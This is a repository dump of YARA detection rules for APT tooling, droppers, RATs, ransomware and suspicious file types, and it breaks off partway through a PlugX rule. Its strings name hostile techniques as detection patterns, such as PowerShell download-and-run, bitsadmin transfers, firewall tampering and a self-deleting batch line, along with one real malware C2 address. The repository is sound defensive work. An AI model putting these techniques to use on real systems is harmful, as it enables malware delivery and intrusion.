├── README.md
└── Yara
    ├── APT
        └── APT_Bitter_T-APT-17.yar
    ├── Dropper
        ├── Vjw0rm.yar
        ├── agent_tesla.yar
        ├── asyncrat.yar
        ├── njrat.yar
        ├── unknown.yar
        ├── valyria.yar
        └── wshrat.yar
    ├── Filetypes
        ├── MALWARE_OneNote_Delivery_Jan23.yar
        ├── SUS_Unsigned_APPX_MSIX_Installer_Feb23.yar
        ├── SUS_Unsigned_APPX_MSIX_Manifest_Feb23.yar
        ├── exe.yar
        ├── iso.yar
        ├── lnk.yar
        ├── powershell.yar
        └── vbs.yar
    ├── Hunting
        └── HUNT_RTF_CVE_2023_21716.yar
    ├── Malware
        ├── MALWARE_Emotet_OneNote_Delivery_wsf_Mar23.yar
        ├── MALWARE_PlugX_USB_Delivery_Jun21.yar
        ├── RANSOM_ESXiArgs_Ransomware_Bash_Feb23.yar
        ├── RANSOM_ESXiArgs_Ransomware_Encrypt_Feb23.yar
        ├── RANSOM_ESXiArgs_Ransomware_Python_Feb23.yar
        ├── RANSOM_Lockbit_Black_Packer.yar
        ├── RANSOM_Magniber_ISO_Jan23.yar
        ├── RANSOM_Magniber_LNK_Jan23.yar
        ├── RANSOM_MedusaLocker_July22.yar
        └── formbook.yar
    ├── Misc
        └── suspicious_sites.yar
    ├── Obfuscation
        ├── javascript_obfuscation.yar
        ├── powershell_obfuscation.yar
        └── vbs_obfuscation.yar
    ├── PowerShell_Misc
        └── download_variations.yar
    ├── RAT
        ├── asyncrat.yar
        ├── n-w0rm.yar
        ├── njrat.yar
        └── wshrat.yar
    ├── Stealer
        └── redline_stealer.yar
    └── Windows
        └── windows_misc.yar


/README.md:
--------------------------------------------------------------------------------
1 | # About
2 | 
3 | This repository contains detection rules and IOCs that we were able to extract and use in the context of our DFIR projects and malware analyses.
4 | 
5 | # Contact
6 | 
7 | Follow us on Twitter: https://twitter.com/SI_FalconTeam
8 | 


--------------------------------------------------------------------------------
/Yara/APT/APT_Bitter_T-APT-17.yar:
--------------------------------------------------------------------------------
  1 | /*
  2 |    Yara Rule Set
  3 |    Author: SECUINFRA Falcon Team
  4 |    Date: 2022-06-23
  5 |    Identifier: 0x03-yara_win-Bitter_T-APT-17
  6 |    Reference: "https://www.secuinfra.com/en/techtalk/whatever-floats-your-boat-bitter-apt-continues-to-target-bangladesh"
  7 | */
  8 | 
  9 | /* Rule Set ----------------------------------------------------------------- */
 10 | 
 11 | rule APT_Bitter_Maldoc_Verify {
 12 |     
 13 |     meta:
 14 |         description = "Detects Bitter (T-APT-17) shellcode in oleObject (CVE-2018-0798)"
 15 |         author = "SECUINFRA Falcon Team (@SI_FalconTeam)"
 16 |         tlp = "WHITE"
 17 |         reference = "https://www.secuinfra.com/en/techtalk/whatever-floats-your-boat-bitter-apt-continues-to-target-bangladesh"
 18 |         date = "2022-06-01"
 19 |         hash0 = "0c7158f9fc2093caf5ea1e34d8b8fffce0780ffd25191fac9c9b52c3208bc450"
 20 |         hash1 = "bd0d25194634b2c74188cfa3be6668590e564e6fe26a6fe3335f95cbc943ce1d"
 21 |         hash2 = "3992d5a725126952f61b27d43bd4e03afa5fa4a694dca7cf8bbf555448795cd6"
 22 | 
 23 |     strings:
 24 |         // This rule is meant to be used for verification of a Bitter Maldoc
 25 |         // rather than a hunting rule since the oleObject it is matching is
 26 |         // compressed in the doc zip
 27 |         
 28 |         $xor_string0 = "LoadLibraryA" xor
 29 |         $xor_string1 = "urlmon.dll" xor
 30 |         $xor_string2 = "Shell32.dll" xor
 31 |         $xor_string3 = "ShellExecuteA" xor
 32 |         $xor_string4 = "MoveFileA" xor    
 33 |         $xor_string5 = "CreateDirectoryA" xor
 34 |         $xor_string6 = "C:\\Windows\\explorer" xor
 35 |         $padding = {000001128341000001128341000001128342000001128342}
 36 |     
 37 |     condition:
 38 |         3 of ($xor_string*)
 39 |         and $padding
 40 | }
 41 | 
 42 | rule APT_Bitter_ZxxZ_Downloader {
 43 |     
 44 |     meta:
 45 |         description = "Detects Bitter (T-APT-17) ZxxZ Downloader"
 46 |         author = "SECUINFRA Falcon Team (@SI_FalconTeam)"
 47 |         TLP = "WHITE"
 48 |         reference = " https://www.secuinfra.com/en/techtalk/whatever-floats-your-boat-bitter-apt-continues-to-target-bangladesh"
 49 |         date = "2022-06-01"
 50 |         hash0 = "91ddbe011f1129c186849cd4c84cf7848f20f74bf512362b3283d1ad93be3e42"
 51 |         hash1 = "90fd32f8f7b494331ab1429712b1735c3d864c8c8a2461a5ab67b05023821787"
 52 |         hash2 = "69b397400043ec7036e23c225d8d562fdcd3be887f0d076b93f6fcaae8f3dd61"
 53 |         hash3 = "3fdf291e39e93305ebc9df19ba480ebd60845053b0b606a620bf482d0f09f4d3"
 54 |         hash4 = "fa0ed2faa3da831976fee90860ac39d50484b20bee692ce7f0ec35a15670fa92"
 55 | 
 56 |     strings:
 57 |         // old ZxxZ samples / decrypted strings
 58 |         $old0 = "MsMp" ascii
 59 |         $old1 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion" ascii
 60 |         $old2 = "&&user=" ascii
 61 |         $old3 = "DN-S" ascii
 62 |         $old4 = "RN_E" ascii
 63 |         
 64 |         // new ZxxZ samples
 65 |         $c2comm0 = "GET /" ascii
 66 |         $c2comm1 = "profile" ascii
 67 |         $c2comm2 = ".php?" ascii
 68 |         $c2comm3 = "data=" ascii
 69 |         $c2comm4 = "Update" ascii
 70 |         $c2comm5 = "TTT" ascii
 71 | 
 72 |     condition:
 73 |         uint16(0) == 0x5a4d
 74 |         and filesize > 39KB // Size on Disk/1.5
 75 |         and filesize < 2MB // Size of Image*1.5
 76 |         and (all of ($old*)) or (all of ($c2comm*))
 77 | }
 78 | 
 79 | import "pe"
 80 | import "dotnet"
 81 | 
 82 | rule APT_Bitter_Almond_RAT {
 83 |     
 84 |     meta:
 85 |         description = "Detects Bitter (T-APT-17) Almond RAT (.NET)"
 86 |         author = "SECUINFRA Falcon Team (@SI_FalconTeam)"
 87 |         tlp = "WHITE"
 88 |         reference = " https://www.secuinfra.com/en/techtalk/whatever-floats-your-boat-bitter-apt-continues-to-target-bangladesh"
 89 |         date = "2022-06-01"
 90 |         hash = "55901c2d5489d6ac5a0671971d29a31f4cdfa2e03d56e18c1585d78547a26396"
 91 | 
 92 |     strings:
 93 |         $function0 = "GetMacid" ascii
 94 |         $function1 = "StartCommWithServer" ascii
 95 |         $function2 = "sendingSysInfo" ascii
 96 | 
 97 |         $dbg0 = "*|END|*" wide
 98 |         $dbg1 = "FILE>" wide
 99 |         $dbg2 = "[Command Executed Successfully]" wide
100 | 
101 |     condition:
102 |         uint16(0) == 0x5a4d
103 |         and dotnet.version == "v4.0.30319"
104 |         and filesize > 12KB // Size on Disk/1.5
105 |         and filesize < 68KB // Size of Image*1.5
106 |         and any of ($function*)
107 |         and any of ($dbg*)
108 | }
109 | 
110 | rule APT_Bitter_PDB_Paths {
111 |     
112 |     meta:
113 |         description = "Detects Bitter (T-APT-17) PDB Paths"
114 |         author = "SECUINFRA Falcon Team (@SI_FalconTeam)"
115 |         tlp = "WHITE"
116 |         reference = "https://www.secuinfra.com/en/techtalk/whatever-floats-your-boat-bitter-apt-continues-to-target-bangladesh"
117 |         date = "2022-06-22"
118 |         hash0 = "55901c2d5489d6ac5a0671971d29a31f4cdfa2e03d56e18c1585d78547a26396"
119 | 
120 |     strings:
121 |         // Almond RAT
122 |         $pdbPath0 = "C:\\Users\\Window 10 C\\Desktop\\COMPLETED WORK\\" ascii
123 |         $pdbPath1 = "stdrcl\\stdrcl\\obj\\Release\\stdrcl.pdb"
124 | 
125 |         // found by Qi Anxin Threat Intellingence Center
126 |         // reference: https://mp.weixin.qq.com/s/8j_rHA7gdMxY1_X8alj8Zg
127 |         $pdbPath2 = "g:\\Projects\\cn_stinker_34318\\"
128 |         $pdbPath3 = "renewedstink\\renewedstink\\obj\\Release\\stimulies.pdb"
129 | 
130 |     condition:
131 |         uint16(0) == 0x5a4d
132 |         and any of ($pdbPath*)
133 | }
134 | 


--------------------------------------------------------------------------------
/Yara/Dropper/Vjw0rm.yar:
--------------------------------------------------------------------------------
 1 | 
 2 | rule DROPPER_Vjw0rm_Stage_1: JavaScript Dropper Vjw0rm {
 3 | 	meta:
 4 | 		author = "SECUINFRA Falcon Team"
 5 | 		reference = "https://bazaar.abuse.ch/browse.php?search=tag%3AVjw0rm"
 6 | 		date = "19.02.2022"
 7 | 		version = "0.1"
 8 | 
 9 | 	strings:
10 | 		$a1 = "$$$"
11 | 		$a2 = "microsoft.xmldom"
12 | 		$a3 = "eval"
13 | 		$a4 = "join(\"\")"
14 | 
15 | 	condition:
16 | 		(uint16(0) == 0x7566 or uint16(0) == 0x6176 or uint16(0) == 0x0a0d or uint16(0) == 0x660a) 
17 | 		and filesize < 60KB 
18 | 		and all of ($a*) 
19 | }


--------------------------------------------------------------------------------
/Yara/Dropper/agent_tesla.yar:
--------------------------------------------------------------------------------
 1 | rule MAL_AgentTesla_Stage_1 : JavaScript AgentTesla ObfuscatorIO {
 2 | 	meta:
 3 | 		author = "SECUINFRA Falcon Team"
 4 | 		hash = "bd257d674778100639b298ea35550bf3bcb8b518978c502453e9839846f9bbec"
 5 | 		reference = "https://bazaar.abuse.ch/sample/bd257d674778100639b298ea35550bf3bcb8b518978c502453e9839846f9bbec/"	
 6 | 		description = "Detects the first stage of AgentTesla (JavaScript)"
 7 | 
 8 | 	strings:
 9 | 		$mz = "TVq"
10 | 		
11 | 		$a1 = ".jar"
12 | 		$a2 = "bin.base64"
13 | 		$a3 = "appdata"
14 | 		$a4 = "skype.exe"
15 | 
16 | 	condition:
17 | 		filesize < 500KB and $mz and 3 of ($a*)
18 | }


--------------------------------------------------------------------------------
/Yara/Dropper/asyncrat.yar:
--------------------------------------------------------------------------------
 1 | 
 2 | rule DROPPER_Asyncrat_VBS_February_2022_1 {
 3 | 	meta:
 4 | 		author = "SECUINFRA Falcon Team"
 5 | 		date = "21.02.2022"
 6 | 		reference = "https://bazaar.abuse.ch/sample/06cd1e75f05d55ac1ea77ef7bee38bb3b748110b79128dab4c300f1796a2b941/"
 7 | 
 8 | 	strings:
 9 | 		$a1 = "http://3.145.46.6/"
10 | 
11 | 		$b1 = "Const HIDDEN_WINDOW = 0"
12 | 		$b2 = "GetObject(\"winmgmts:\\\\"
13 | 
14 | 		$c = "replace("
15 | 
16 | 	condition:
17 | 		filesize < 10KB and ($a1 or (all of ($b*) and #c > 10))
18 | }


--------------------------------------------------------------------------------
/Yara/Dropper/njrat.yar:
--------------------------------------------------------------------------------
 1 | 
 2 | rule DROPPER_njrat_VBS : vbs njrat dropper {
 3 | 	meta:
 4 | 		author = "SECUINFRA Falcon Team"
 5 | 		date = "27.02.2022"
 6 | 		reference = "https://bazaar.abuse.ch/sample/daea0b5dfcc3e20b75292df60fe5f0e16a40735254485ff6cc7884697a007c0d/"
 7 | 
 8 | 	strings:
 9 | 		$a1 = "[System.Convert]::FromBase64String( $Codigo.replace(" wide
10 | 		$a2 = "WDySjnçIJwGnYGadvbOQBvKzlNzWDDgUqgGlLKÇQvvkKPNjaUIdApxgqHTfDLUkfOKsXOKçDcQtltyXDXhNNbGNNPACgAzWRtuLt" wide 
11 | 
12 | 		$b1 = "CreateObject(\"WScript.Shell\")" wide
13 | 		$b2 = "\"R\" + \"e\" + \"p\" + \"l\" + \"a\" + \"c\" + \"e\"" wide
14 | 		$b3 = "BBBB\" + \"BBBBBBB\" + \"BBBBBBB\" + \"BBBBBBBB" wide
15 | 		$b4 = "& DGRP & NvWt & DGRP &" wide
16 | 		$b5 = "= ogidoC$" wide
17 | 
18 | 	condition:
19 | 		filesize < 300KB
20 | 		and (
21 | 			(1 of ($a*)) or (2 of ($b*))
22 | 		)
23 | }


--------------------------------------------------------------------------------
/Yara/Dropper/unknown.yar:
--------------------------------------------------------------------------------
 1 | rule DROPPER_Unknown_1 : Dropper HTA {
 2 | 	meta:
 3 | 		author = "SECUINFRA Falcon Team"
 4 | 		hash = "1749f4127bba3f7204710286b1252e14"
 5 | 		reference = "https://bazaar.abuse.ch/sample/c2bf8931028e0a18eeb8f1a958ade0ab9d64a00c16f72c1a3459f160f0761348/"
 6 | 		description = "Detects unknown HTA Dropper"
 7 | 		date = "10.02.2022"
 8 | 
 9 | 	strings:
10 | 		$a1 = "<script type=\"text/vbscript\" LANGUAGE=\"VBScript\" >"
11 | 		$a2 = "Function XmlTime(t)"
12 | 		$a3 = "C:\\ProgramData\\"
13 | 		$a4 = "wscript.exe"
14 | 		$a5 = "Array" nocase
15 | 
16 | 		$b = "chr" nocase
17 | 
18 | 
19 | 	condition:
20 | 		filesize < 70KB and all of ($a*) and #b > 7
21 | }


--------------------------------------------------------------------------------
/Yara/Dropper/valyria.yar:
--------------------------------------------------------------------------------
 1 | rule DROPPER_Valyria_Stage_1: JavaScript VBS Valyria{
 2 | 	meta:
 3 | 		author = "SECUINFRA Falcon Team"
 4 | 		reference = "https://bazaar.abuse.ch/sample/c8a8fea3cbe08cd97e56a0e0dbc59a892f8ab1ff3b5217ca3c9b326eeee6ca66/"
 5 | 		date = "18.02.2022"
 6 | 		description = "Family was taken from VirusTotal"
 7 | 
 8 | 	strings:
 9 | 		$a1 = "<script language=\"vbscript\">"
10 | 		$a2 = "<script language=\"javascript\">"
11 | 
12 | 		$b1 = "window.resizeTo(0,0);"
13 | 		$b2 = ".Environment"
14 | 		$b3 = ".item().Name"
15 | 		$b4 = "v4.0.30319"
16 | 		$b5 = "v2.0.50727"
17 | 
18 | 		$c1 = "Content Writing.docx"
19 | 		$c2 = "eval"
20 | 
21 | 	condition:
22 | 		filesize < 600KB and all of ($a*) and 3 of ($b*) and 1 of ($c*)
23 | }
24 | 


--------------------------------------------------------------------------------
/Yara/Dropper/wshrat.yar:
--------------------------------------------------------------------------------
 1 | rule DROPPER_WSHRAT_Stage_1 {
 2 | 	meta:
 3 | 		author = "SECUINFRA Falcon Team"
 4 | 		reference = "https://bazaar.abuse.ch/sample/ad24ae27346d930e75283b10d4b949a4986c18dbd5872a91f073334a08169a14/"
 5 | 		date = "11.02.2022"
 6 | 		hash = "793eff1b2039727e76fdd04300d44fc6"
 7 | 		description = "Detects the first stage of WSHRAT as obfuscated JavaScript"
 8 | 
 9 | 	strings:
10 | 		$a1 = "'var {0} = WS{1}teObject(\"ado{2}am\");"
11 | 
12 | 		$b1 = "String[\"prototype\"]"
13 | 		$b2 = "this.replace("
14 | 		$b3 = "Array.prototype"
15 | 
16 | 	condition:
17 | 		filesize < 1500KB and $a1 and #b3 > 3 and #b1 > 2 and $b2
18 | }


--------------------------------------------------------------------------------
/Yara/Filetypes/MALWARE_OneNote_Delivery_Jan23.yar:
--------------------------------------------------------------------------------
 1 | rule MALWARE_OneNote_Delivery_Jan23
 2 | {
 3 | 	meta:
 4 | 		author = "SECUINFRA Falcon Team (@SI_FalconTeam)"
 5 | 		description = "Detects suspicious Microsoft OneNote files used to deliver Malware"
 6 | 		reference = "https://twitter.com/James_inthe_box/status/1615421130877329409"
 7 | 		date = "2023-01-19"
 8 | 		tlp = "CLEAR"
 9 | 		hash0 = "18af397a27e58afb901c92f37569d48e3372cf073915723e4e73d44537bcf54d"
10 | 		hash1 = "de30f2ba2d8916db5ce398ed580714e2a8e75376f31dc346b0e3c898ee0ae4cf"
11 | 		hash2 = "bfc979c0146d792283f825f99772370f6ff294dfb5b1e056943696aee9bc9f7b"
12 | 		hash3 = "e0d9f2a72d64108a93e0cfd8066c04ed8eabe2ed43b80b3f589b9b21e7f9a488"
13 | 		hash4 = "3f00a56cbf9a0e59309f395a6a0b3457c7675a657b3e091d1a9440bd17963f59"
14 | 
15 | 	strings:
16 | 		// HTA
17 | 		$hta = "hta:application" nocase
18 | 		$script1 = "type=\"text/vbscript\""
19 | 		$script2 = "language=\"VBScript\""
20 | 		
21 | 		// Powershell
22 | 		$powershell = "powershell" nocase
23 | 		$startProc = "Start-Process -Filepath"
24 | 		$webReq = "Invoke-WebRequest -Uri"
25 | 		$bitsadmin = "bitsadmin /transfer"
26 | 		
27 | 		//WScript
28 | 		$wscript = "WScript.Shell" nocase
29 | 		$autoOpen = "Sub AutoOpen()"
30 | 		$root = "GetObject(\"winmgmts:\\.\\root\\cimv2\")"
31 | 		$wsfExt = ".wsf" ascii wide
32 | 		$vbsExt = ".vbs" ascii wide
33 | 
34 | 		// Batch
35 | 		$cmd = "cmd /c" nocase
36 | 		$batch = "@echo off"
37 | 		$batExt = ".bat" ascii wide
38 | 		$delExit = "(goto) 2>nul & del \"%~f0\"..exit /b"
39 | 
40 | 		// PE Files
41 | 		$dosString = "!This program cannot be run in DOS mode"
42 | 		$exeExt = ".exe" ascii wide
43 | 		
44 | 		// Image Lure
45 | 		$imageFile = "button_click-to-view-document.png" wide
46 | 		$click = "click to view document" nocase wide
47 | 		
48 | 		// Leaked File Paths
49 | 		$path1 = "C:\\Users\\My\\OneDrive\\Desktop" wide
50 | 		$path2 = "C:\\Users\\Administrator\\Documents\\Dove" wide
51 | 		$path3 = "C:\\Users\\julien.galleron\\Downloads" wide
52 | 	
53 | 	condition:
54 | 		uint32be(0x0) == 0xE4525C7B
55 | 		and 3 of them
56 | }


--------------------------------------------------------------------------------
/Yara/Filetypes/SUS_Unsigned_APPX_MSIX_Installer_Feb23.yar:
--------------------------------------------------------------------------------
 1 | rule SUS_Unsigned_APPX_MSIX_Installer_Feb23
 2 | {
 3 | 	meta:
 4 | 		author = "SECUINFRA Falcon Team (@SI_FalconTeam)"
 5 | 		description = "Detects suspicious, unsigned Microsoft Windows APPX/MSIX Installer Packages"
 6 | 		reference = "https://twitter.com/SI_FalconTeam/status/1620500572481945600"
 7 | 		date = "2023-02-01"
 8 | 		tlp = "CLEAR"
 9 | 
10 | 	strings:
11 | 		$s_manifest = "AppxManifest.xml"
12 | 		$s_block = "AppxBlockMap.xml"
13 | 		$s_peExt = ".exe"
14 | 
15 | 		// we are not looking for signed packages
16 | 		$sig = "AppxSignature.p7x"
17 | 
18 | 	condition:
19 | 		uint16be(0x0) == 0x504B
20 | 		and 2 of ($s*)
21 | 		and not $sig
22 | }
23 | 


--------------------------------------------------------------------------------
/Yara/Filetypes/SUS_Unsigned_APPX_MSIX_Manifest_Feb23.yar:
--------------------------------------------------------------------------------
 1 | rule SUS_Unsigned_APPX_MSIX_Manifest_Feb23
 2 | {
 3 | 	meta:
 4 | 		author = "SECUINFRA Falcon Team (@SI_FalconTeam)"
 5 | 		description = "Detects suspicious Microsoft Windows APPX/MSIX Installer Manifests"
 6 | 		reference = "https://twitter.com/SI_FalconTeam/status/1620500572481945600"
 7 | 		date = "2023-02-01"
 8 | 		tlp = "CLEAR"
 9 | 
10 | 	strings:
11 | 		$xlmns = "http://schemas.microsoft.com/appx/manifest/"
12 | 		
13 | 		// as documented here: https://learn.microsoft.com/en-us/windows/msix/package/unsigned-package
14 | 		$identity = "OID.2.25.311729368913984317654407730594956997722=1"
15 | 		
16 | 		$s_entrypoint = "EntryPoint=\"Windows.FullTrustApplication\""
17 | 		$s_capability = "runFullTrust"
18 | 		$s_peExt = ".exe"
19 | 
20 | 	condition:
21 | 		uint32be(0x0) == 0x3C3F786D
22 | 		and $xlmns
23 | 		and $identity
24 | 		and 2 of ($s*)
25 | }
26 | 


--------------------------------------------------------------------------------
/Yara/Filetypes/exe.yar:
--------------------------------------------------------------------------------
 1 | import "pe"
 2 | 
 3 | rule SUSP_Discord_Attachments_URL : pe download {
 4 | 	meta:
 5 | 		author = "SECUINFRA Falcon Team"
 6 | 		date = "19.02.2022"
 7 | 		description = "Detects a PE file that contains an Discord Attachments URL. This is often used by Malware to download further payloads"
 8 | 		version = "0.1"
 9 | 
10 | 	strings:
11 | 		$url = "cdn.discordapp.com/attachments" nocase wide
12 | 
13 | 	condition:
14 | 		uint16(0) == 0x5a4d 
15 | 		and $url
16 | }
17 | 
18 | rule SUSP_Ngrok_URL : pe download {
19 | 	meta:
20 | 		author = "SECUINFRA Falcon Team"
21 | 		date = "27.02.2022"
22 | 		description = "Detects a PE file that contains an ngrok.io URL. This can be used as C2 channel"
23 | 
24 | 	strings:
25 | 		$url = "ngrok.io" nocase wide
26 | 
27 | 	condition:
28 | 		uint16(0) == 0x5a4d 
29 | 		and $url
30 | }
31 | 
32 | rule SUSP_Reverse_DOS_header : pe obfuscation {
33 | 	meta:
34 | 		author = "SECUINFRA Falcon Team"
35 | 		date = "19.02.2022"
36 | 		description = "Detects an reversed DOS header"
37 | 
38 | 	strings:
39 | 		$reversed = "edom SOD ni nur eb tonnac margorp sihT" ascii wide 
40 | 
41 | 	condition:
42 | 		filesize < 500KB and $reversed
43 | }
44 | 
45 | rule SUSP_DOTNET_PE_Download_To_SpecialFolder : dotnet download {
46 | 	meta:
47 | 		author = "SECUINFRA Falcon Team"
48 | 		date = "27.02.2022"
49 | 		description = "Detects a .NET Binary that downloads further payload and retrieves a special folder"
50 | 
51 | 	strings:
52 | 		$special_folder = "Environment.SpecialFolder" wide
53 | 
54 | 		$webclient = "WebClient()" wide
55 | 		$download = ".DownloadFile(" wide
56 | 
57 | 	condition:
58 | 		uint16(0) == 0x5a4d 
59 | 		and filesize < 100KB 
60 | 		and pe.imports("mscoree.dll")
61 | 		and $special_folder 
62 | 		and $webclient 
63 | 		and $download
64 | }
65 | 
66 | rule SUSP_DOTNET_PE_List_AV : dotnet av {
67 | 	meta:
68 | 		author = "SECUINFRA Falcon Team"
69 | 		date = "27.02.2022"
70 | 		description = "Detecs .NET Binary that lists installed AVs"
71 | 
72 | 	strings:
73 | 		$mgt_obj_searcher = "\\root\\SecurityCenter2" wide
74 | 		$query = "Select * from AntivirusProduct" wide
75 | 
76 | 	condition:
77 | 		uint16(0) == 0x5a4d
78 | 		and filesize < 200KB
79 | 		and pe.imports("mscoree.dll")
80 | 		and $mgt_obj_searcher
81 | 		and $query
82 | }
83 | 
84 | rule SUSP_netsh_firewall_command : pe {
85 | 	meta:
86 | 		author = "SECUINFRA Falcon Team"
87 | 		date = "27.02.2022"
88 | 
89 | 	strings:
90 | 		$netsh_delete = "netsh firewall delete" wide
91 | 		$netsh_add = "netsh firewall add" wide
92 | 
93 | 	condition:
94 | 		uint16(0) == 0x5a4d
95 | 		and filesize < 100KB
96 | 		and ($netsh_delete or $netsh_add)
97 | }


--------------------------------------------------------------------------------
/Yara/Filetypes/iso.yar:
--------------------------------------------------------------------------------
 1 | rule SUSP_VBS_in_ISO: VBS ISO {
 2 | 	meta:
 3 | 		author = "SECUINFRA Falcon Team"
 4 | 		description = "Detects ISO files that contain VBS functions"
 5 | 		date = "13.02.2022"
 6 | 		reference = "Internal Research"
 7 | 		version = "v0.2"
 8 | 
 9 | 	strings:
10 | 		$magic = { 43 44 30 30 31 }
11 | 
12 | 		$a1 = { 43 72 65 61 74 65 4F 62 6A 65 63 74 } // CreateObject
13 | 		$a2 = { 72 65 70 6C 61 63 65 } // replace 
14 | 
15 | 	condition:
16 | 		filesize < 800KB 
17 | 		and $magic 
18 | 		and 1 of ($a*)
19 | }
20 | 
21 | rule SUSP_EXE_in_ISO: EXE ISO {
22 | 	meta:
23 | 		author = "SECUINFRA Falcon Team"
24 | 		description = "Detects ISO files that contains an Exe file. Does not need to be malicious"
25 | 		date = "19.02.2022"
26 | 		reference = "Internal Research"
27 | 
28 | 	strings:
29 | 		$magic = { 43 44 30 30 31 }
30 | 		$mz = { 4D 5A }
31 | 
32 | 	condition:
33 | 		filesize > 100KB 
34 | 		and filesize < 800KB 
35 | 		and $magic 
36 | 		and $mz
37 | }


--------------------------------------------------------------------------------
/Yara/Filetypes/lnk.yar:
--------------------------------------------------------------------------------
 1 | rule SUSP_LNK_CMD {
 2 | 	meta:
 3 | 		author = "SECUINFRA Falcon Team"
 4 | 		date = "19.02.2022"
 5 | 		description = "Detects the reference to cmd.exe inside an lnk file, which is suspicious"
 6 | 	strings:
 7 | 		$header = {4c00 0000 0114 0200 0000}
 8 | 		$cmd = "cmd.exe" ascii wide
 9 | 
10 | 	condition:
11 | 		filesize < 5KB 
12 | 		and ($header at 0) 
13 | 		and $cmd
14 | }
15 | 
16 | rule SUSP_LNK_PowerShell {
17 | 	meta:
18 | 		author = "SECUINFRA Falcon Team"
19 | 		date = "27.02.2022"
20 | 		description = "Detects the reference to powershell inside an lnk file, which is suspicious"
21 | 	strings:
22 | 		$header = {4c00 0000 0114 0200 0000}
23 | 		$ps1 = "powershell.exe" ascii wide
24 | 
25 | 	condition:
26 | 		filesize < 5KB 
27 | 		and ($header at 0) 
28 | 		and $ps1
29 | }
30 | 
31 | rule SUSP_LNK_Staging_Directory {
32 | 	meta:
33 | 		author = "SECUINFRA Falcon Team"
34 | 		date = "27.02.2022"
35 | 		description = "Detects typical staging directories being referenced inside lnk files"
36 | 
37 | 	strings:
38 | 		$header = {4c00 0000 0114 0200 0000}
39 | 		$public = "$env:public" wide
40 | 
41 | 	condition:
42 | 		filesize < 20KB
43 | 		and ($header at 0)
44 | 		and $public
45 | 
46 | }


--------------------------------------------------------------------------------
/Yara/Filetypes/powershell.yar:
--------------------------------------------------------------------------------
 1 | rule SUSP_PowerShell_Download_Temp_Rundll : powershell download {
 2 | 	meta:
 3 | 		author = "SECUINFRA Falcon Team"
 4 | 		description = "Detect a Download to %temp% and execution with rundll32.exe"
 5 | 		date = "09.02.2022"
 6 | 
 7 | 	strings:
 8 | 		$location = "$Env:temp" nocase
 9 | 		$download = "downloadfile(" nocase
10 | 		$rundll = "rundll32.exe"
11 | 
12 | 	condition:
13 | 		filesize < 100KB 
14 | 		and $location 
15 | 		and $download 
16 | 		and $rundll
17 | }
18 | 
19 | rule SUSP_PowerShell_Base64_Decode : powershell b64 {
20 | 	meta:
21 | 		author = "SECUINFRA Falcon Team"
22 | 		description	= "Detects PowerShell code to decode Base64 data. This can yield many FP"
23 | 		date = "27.02.2022"
24 | 
25 | 	strings:
26 | 		$b64_decode = "[System.Convert]::FromBase64String("
27 | 
28 | 	condition:
29 | 		filesize < 500KB 
30 | 		and $b64_decode
31 | }


--------------------------------------------------------------------------------
/Yara/Filetypes/vbs.yar:
--------------------------------------------------------------------------------
 1 | 
 2 | 
 3 | rule SUSP_VBS_Wscript_Shell {
 4 | 	meta:
 5 | 		author = "SECUINFRA Falcon Team"
 6 | 		date = "27.02.2022"
 7 | 		description = "Detects the definition of 'Wscript.Shell' which is often used by Malware, FPs are possible and commmon"
 8 | 
 9 | 	strings:
10 | 		$wscript = "CreateObject(\"WScript.Shell\")" wide nocase
11 | 
12 | 	condition:
13 | 		filesize < 300KB and $wscript
14 | }


--------------------------------------------------------------------------------
/Yara/Hunting/HUNT_RTF_CVE_2023_21716.yar:
--------------------------------------------------------------------------------
 1 | import "console"
 2 | 
 3 | rule HUNT_RTF_CVE_2023_21716_Mar23
 4 | {
 5 | 	meta:
 6 | 		author = "SECUINFRA Falcon Team (@SI_FalconTeam)"
 7 | 		description = "Detects RTF documents with an inflated fonttable. Hunting for CVE-2023-21716"
 8 | 		reference = "https://www.bleepingcomputer.com/news/security/proof-of-concept-released-for-critical-microsoft-word-rce-bug/"
 9 | 		date = "2023-03-07"
10 | 		tlp = "CLEAR"
11 | 
12 | 	strings:
13 | 		$fonttbl_len = /\\fonttbl\{.{1,10}\;\}(\s.{1,10}\}){10,}/
14 | 
15 | 	condition:
16 | 		uint32be(0x0) == 0x7B5C7274
17 | 		and !fonttbl_len[1] > 256
18 | 		// the "console" module requires Yara 4.2.0 or later, comment out the line below for older versions
19 | 		and console.log("[!] Inflated fonttable with length: ", !fonttbl_len[1])
20 | }
21 | 


--------------------------------------------------------------------------------
/Yara/Malware/MALWARE_Emotet_OneNote_Delivery_wsf_Mar23.yar:
--------------------------------------------------------------------------------
 1 | rule MALWARE_Emotet_OneNote_Delivery_wsf_Mar23
 2 | {
 3 | 	meta:
 4 | 		author = "SECUINFRA Falcon Team (@SI_FalconTeam)"
 5 | 		description = "Detects Microsoft OneNote files used to deliver Emotet (.wsf Payload)"
 6 | 		reference = "https://www.secuinfra.com/en/news/the-whale-surfaces-again-emotet-epoch4-spam-botnet-returns/"
 7 | 		date = "2023-03-16"
 8 | 		tlp = "CLEAR"
 9 | 		hash0 = "dd9fcdcaf5c26fc27863c86aa65948924f23ab9faa261562cbc9d65ac80d33d4"
10 | 		hash1 = "ca2234b9c6f7c453b91a1ca10fc7b05487f94850be7ac5ea42986347d93772d8"
11 | 		hash2 = "b75681c1f99c4caf541478cc417ee9e8fba48f9b902c45d8bda0158a61ba1a2f"
12 | 		hash3 = "7c4591fd03b73ba6d0ec71a3cf89a04bfb4bd240d359117d96834a83727bdcc2"
13 | 
14 | 	strings:
15 | 
16 | 		$s_protected = "This document is protected" wide
17 | 		$s_click = "You have to double-click \"View\" button to open" wide
18 | 		$s_imgFileName = "Untitled picture.jpg" wide
19 | 
20 | 		$script = "language=\"VBScript\""
21 | 		$wsfExt = ".wsf" ascii wide
22 | 
23 | 		$GUIDwsf = {E7 16 E3 BD 65 26 11 45 A4 C4 8D 4D 0B 7A 9E AC ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 3C 6A 6F 62 20 69 64 3D 22}
24 | 		$endTmp = /rad.{5}\.tmp/ 
25 | 
26 | 	condition:
27 | 		uint32be(0x0) == 0xE4525C7B
28 | 		and any of ($s_*)
29 | 		and $script
30 | 		and $wsfExt
31 | 		and $GUIDwsf
32 | 		and $endTmp
33 | }


--------------------------------------------------------------------------------
/Yara/Malware/MALWARE_PlugX_USB_Delivery_Jun21.yar:
--------------------------------------------------------------------------------
 1 | rule MALWARE_PlugX_USB_Delivery_LNK_Jun23
 2 | {
 3 |     meta:
